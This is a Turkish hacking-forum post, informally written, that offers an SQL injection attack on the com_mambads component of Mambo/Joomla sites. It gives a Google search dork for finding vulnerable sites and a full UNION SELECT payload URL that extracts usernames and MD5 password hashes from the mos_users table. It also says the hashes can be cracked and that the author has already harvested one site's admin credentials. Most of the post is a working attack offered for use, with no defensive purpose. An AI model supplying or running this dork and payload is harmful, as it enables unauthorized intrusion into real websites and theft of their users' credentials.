Selam arkadaşlar eskiler bilir paylaşımlarımısı allah ızın werırse gene aynı paylaşımları yapmaya başlıcaz yawas yawas
şimdi gelelim açıgımıza acıgımız sql enjeksiyon açıgın bulunusu tamamen bana şahsıma ait olup daha önce hiç bir yerde paylaşılmamıstır ve bır çok sıtede md5 ele gecırılmektedır md5 kırmak ıse zor we zahmetlı bır ıstır ama kıran programlar da war ben bu acıkla bır sıtenın admın bılgılerını buldım onuda lınk olarak paylaşocam dokunmadım sıteye
buda ayrı bı kıyagım olsun
şidi gelelım yapmamıs gerekene öncelikle her saman oldugu gıbı gogle babamısda verecegım arama kodunu aratıyoruz we daha sonrakı satırda werecegım sql enjeksıyon kodunu sıtenın sonuna eklıces hepsı bu kadara basıt umarım ısınıze yarar
arama kodumuz
"inurl:com_mambads"
sql kodumus
index.php?option=com_mambads&Itemid=0&func=detail& cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,1 01,58),username,char(32,112,97,115,115,119,111,114 ,100,58),password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23%20from%20mos_users/*
umarım ısınıze yarar
saygılarımla...